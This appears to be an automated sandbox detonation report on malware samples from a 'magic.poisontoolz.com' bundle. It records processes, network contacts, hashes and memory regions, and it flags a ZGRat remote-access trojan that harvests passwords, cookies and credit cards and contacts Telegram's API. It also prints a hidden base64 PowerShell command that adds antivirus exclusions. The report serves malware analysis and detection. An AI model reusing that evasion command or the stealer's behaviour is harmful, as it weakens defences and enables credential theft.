US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

2s

Max time network

88s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"

C:\Users\Admin\AppData\Local\Temp\rock.exe

"C:\Users\Admin\AppData\Local\Temp\rock.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 53.191.33.194.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp

Files

memory/1200-0-0x0000000000E10000-0x0000000001382000-memory.dmp

memory/1200-1-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/1200-2-0x0000000001B80000-0x0000000001B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 b5a9a31834ca48de5da58107f646a2a6
SHA1 18de389616225e3d740d288262a5c5bca5f11fc4
SHA256 52df0926bf74c947e9959bd680421d47dab959a0fa12402127c7eb587b7a1d95
SHA512 eeed1552481a59c748feb68f5d9d701e261d2e4bd250ecb399274b4f5bca8101a35520cf2891447ba3cdded40ceca70e546d3090abd1eaf979c0a16a661c566b

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 69e9f5b9e1c5ef06143471ae6022f996
SHA1 fb74e045c41ef9fa9a11d3ec88ace82bb82f1729
SHA256 70ba794963458cf9a8373869cf91aa234ecbdd596d2069237d1282718c3a68e7
SHA512 57f75155c86a1079bfdc735a96c5ea6438e5227fc4e5b15ebd7fb329929a54e0d434700508700b1083d3fdc08a99b13c4e4cad9e33d621a6a8f4aaaa1272df87

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 6fba0bc9d0671236ec252f7c5b014d57
SHA1 ab4a0d7bd02e3c1d259553085214ae6f5dae3177
SHA256 7c6c4ec6dbd68f2c0947cb46d6d3d4b091321c2209344332b59d97e177b6ca83
SHA512 8b69836353df340a1df412e6e926d41c2e1a9d3cb2ae6cbf751f4d68990f1c92475492aab0ef52e364329303018a4e3999d4cae72de2ae9a13aa9af249783d43

memory/2576-32-0x0000027390990000-0x0000027390B08000-memory.dmp

memory/1200-34-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/2576-33-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/3892-36-0x0000000000B80000-0x0000000000C1C000-memory.dmp

memory/3892-35-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 e483b733c95b33af0dc4257eeaf24ff2
SHA1 8e51b0545596abb59361dd71999524eebd481908
SHA256 562bfea0a5e27bb37cfdcf26397989d7a1b48ee34dbe0ceeaf50c2a5b110791f
SHA512 8db7cc418ffea771f6937e326bec01f86a48ddd1019998e6217d2d0cc532301b33a0a05aa6b377c7b9e549093dd95ca69a8bce9728223e8bb055d2d1ee640f83

memory/2576-37-0x00000273AB170000-0x00000273AB180000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 21656b2a4a4b65faff027532bd7f1504
SHA1 957cf154d9447d2bb1498fab227b0ced0bf65d2c
SHA256 49e25464f406c4df62df2ef15bebc68f36058d0feb9fae1ff60d6441d2528b36
SHA512 7980929460c9d0d4eb453571b201b08e9db272b4bc3dad242b6d66cd4db066253bf25f6e1678094d170f24295c8eb5c9cf9930c5395e22fd15b102219541db91

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 c1fcd3f9800bbfb95a0e9c2cb7ca20b2
SHA1 c65076ad5f65b7fe8e72cf7db2d0da7fe6d16d53
SHA256 1b297af1fd0406ddf9f645636db79438761650b3d03adba24c2739d137fcaf14
SHA512 4867f657c6d060308364310dc53eaad7835f8721cac5f1eaa965716859d5293aca31ed0bd55fa3266c76ad8298a872fa96e2717440438ec533d65072b82b31ce

memory/3892-38-0x0000000005490000-0x00000000054A0000-memory.dmp

memory/3892-39-0x00000000054A0000-0x0000000005588000-memory.dmp

memory/3892-41-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-43-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-52-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-58-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-60-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-64-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-70-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/2576-73-0x00000273AB100000-0x00000273AB150000-memory.dmp

memory/3892-75-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-82-0x00000000054A0000-0x0000000005582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 36f6acc2229073f5bb4074cee73d1d5b
SHA1 b2adbb44350d984dff40c15fcbbeb3379c7ec0e5
SHA256 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35
SHA512 da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad

memory/3892-115-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-121-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-127-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-135-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-137-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-133-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-131-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-129-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-125-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-123-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-119-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-117-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-113-0x00000000054A0000-0x0000000005582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt

MD5 6be6fdca0cfa94635b8689b2b0bf2bee
SHA1 379c61029b5443c3d3df7c770423e40618b36d15
SHA256 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA512 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

memory/3892-90-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-72-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-68-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-66-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-62-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-56-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-54-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-50-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-48-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-46-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/3892-40-0x00000000054A0000-0x0000000005582000-memory.dmp

memory/2576-463-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

memory/3892-2288-0x0000000005690000-0x00000000056DC000-memory.dmp

memory/3892-2287-0x0000000005630000-0x0000000005686000-memory.dmp

memory/3892-2289-0x0000000005850000-0x00000000058B6000-memory.dmp

memory/3892-2290-0x0000000005C70000-0x0000000005CC4000-memory.dmp

memory/3892-2293-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2168-2296-0x0000020630B40000-0x0000020630B50000-memory.dmp

memory/2168-2306-0x00000206490D0000-0x00000206490F2000-memory.dmp

memory/2168-2307-0x0000020630B40000-0x0000020630B50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joffblep.we4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-2295-0x0000020630B40000-0x0000020630B50000-memory.dmp

memory/2168-2294-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

memory/2168-2310-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

MD5 b436f694b4f5182e9f31c4eae47bb0fb
SHA1 3d0d136ec3e24c2dbc205b71770c6125effc8936
SHA256 08206dcfb5782fa050ae2462abc8076fe4a72defb96db46c8bde9f6295746e79
SHA512 7e2cda355d78dfe8f23a6709967c327f871628e6f9cff879d32adcd58dfde62963eca1c04cb442fd548ccc67b444b8a9329617d775504c3654c5910e12f7cfc9

C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe

MD5 06bf68af8360c9c6fe3ebd5f59c03495
SHA1 9149177f83ff4da16ab8bb9b77c94e5b55f3b454
SHA256 fd9fd323b5934ecfc817a62a688a428bae61bbc80a12e43fe20637e9bfc47a50
SHA512 95435c8c23b7c295fd08a0cd200c95d29183e5675a71f32ba6a6feba8bbee2ec8657d7364c97a46f6bf3fed404732898720768a56a48ece29ad8cd5b64266915

memory/3984-2314-0x0000000002930000-0x0000000002940000-memory.dmp

memory/3984-2313-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2960-4522-0x0000000005490000-0x00000000054A0000-memory.dmp

memory/3984-4523-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2960-4521-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1148-5654-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

memory/1148-5656-0x0000028263D40000-0x0000028263D50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/1148-5989-0x0000028263D40000-0x0000028263D50000-memory.dmp

memory/1148-6205-0x0000028263D40000-0x0000028263D50000-memory.dmp

memory/1148-6745-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp

memory/2960-6746-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

MD5 0b97baabefc29ff0dffd2ccaab0a208f
SHA1 aac9bed37cabfc6728ecd4d3d5e241c965071a0e
SHA256 ebf6065c587ef7db9230d9811d4cb4d2bb3e9f947036c7f3aae704e77137bb32
SHA512 71a5712b119249a583b59688bb2e461cb7b320fd1575ed3fc8c5ced95b75405b7dab2194035d2a511ae9a6529968711c599942077efc3bece6d5f6ec1f6a48d9

memory/2576-6751-0x00000000001F0000-0x000000000020C000-memory.dmp

memory/2576-6752-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/2576-6753-0x0000000004A70000-0x0000000004A80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2576-6754-0x0000000005580000-0x00000000056B6000-memory.dmp

memory/2576-7687-0x00000000056B0000-0x00000000056B1000-memory.dmp

memory/2576-7688-0x00000000058B0000-0x000000000597E000-memory.dmp

memory/2576-7689-0x0000000006160000-0x0000000006704000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nxryyws.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/3560-7694-0x0000000000400000-0x0000000000578000-memory.dmp

memory/3560-7697-0x0000000005830000-0x00000000058C2000-memory.dmp

memory/3560-7698-0x0000000005A80000-0x0000000005A90000-memory.dmp

memory/2576-7696-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/3560-7695-0x0000000074BB0000-0x0000000075360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nxryyws.exe

MD5 20431b8ed3a072f81845a821249a01af
SHA1 6f15694b5fde1fdec4674928226f45499522f141
SHA256 56743a8bbb6d27acad0101d325b1a264156394dd11908da039f95209e5a0d388
SHA512 fa391aafbf5a81f868f1559e24ee040b5c0c7cf5be5e20669fdefbcc68daeae355899fe9723e245cd76d272ab0fce024896badc3002914264caf6ed031ece4fe

memory/3560-7699-0x0000000006770000-0x000000000677A000-memory.dmp

memory/3560-7700-0x0000000008FD0000-0x0000000009020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt

MD5 824ce7c07117a630e9b31638f89476aa
SHA1 2d012f1cd8b636de1662f69d213b3cf9fa5df846
SHA256 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd
SHA512 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945

memory/3560-7741-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/3560-7740-0x0000000005A80000-0x0000000005A90000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

0s

Max time network

147s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Pphucxdmff.dat

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Pphucxdmff.dat

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
GB 96.17.179.70:80 tcp
US 8.8.8.8:53 70.179.17.96.in-addr.arpa udp
GB 96.17.179.68:80 tcp
GB 96.17.179.68:80 tcp
GB 96.17.179.83:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
GB 96.17.179.83:80 tcp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
PL 93.184.221.240:80 tcp

Files

memory/4080-16-0x000002626A440000-0x000002626A450000-memory.dmp

memory/4080-36-0x00000262728E0000-0x00000262728E1000-memory.dmp

memory/4080-35-0x00000262727D0000-0x00000262727D1000-memory.dmp

memory/4080-34-0x00000262727D0000-0x00000262727D1000-memory.dmp

memory/4080-32-0x00000262727A0000-0x00000262727A1000-memory.dmp

memory/4080-0-0x000002626A340000-0x000002626A350000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

130s

Max time network

153s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 54.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 3feb7dde744972cacd8d20fb8e1e6e17
SHA1 e2edfb90cda9fe0977d007ab88a4524d34be321b
SHA256 c234ad4ac0971981297c69144e4b20511fe908d43943c252dfd7db780d2e194e
SHA512 3fa0a15376d5fdc383e353f7caf4595b276adcc8160e93e284751abd546a19ad067df0daf9095c2c7c7f9b5e1d459a740c76650d984005f51e8b62da22e49865

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 e8e36b528974f6fac920c0bb58e47f37
SHA1 99c411cfc0f80d8be72717f04a276df466c87fd4
SHA256 23471c2bf7b3025197d55fdf0cd28304cc7083ebc5d853b7f3515a265161855c
SHA512 c0daf493dd6a5ad00094d10b7822f5e26c2dfcffdc72eb29c5b73f31d4ce5e7963c4e69a2d30e70edc72b4bf4425eebbc12844fa746b21b048f47ae60a2bce6f

Analysis: behavioral19

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:24

Platform

win10v2004-20231215-en

Max time kernel

138s

Max time network

166s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
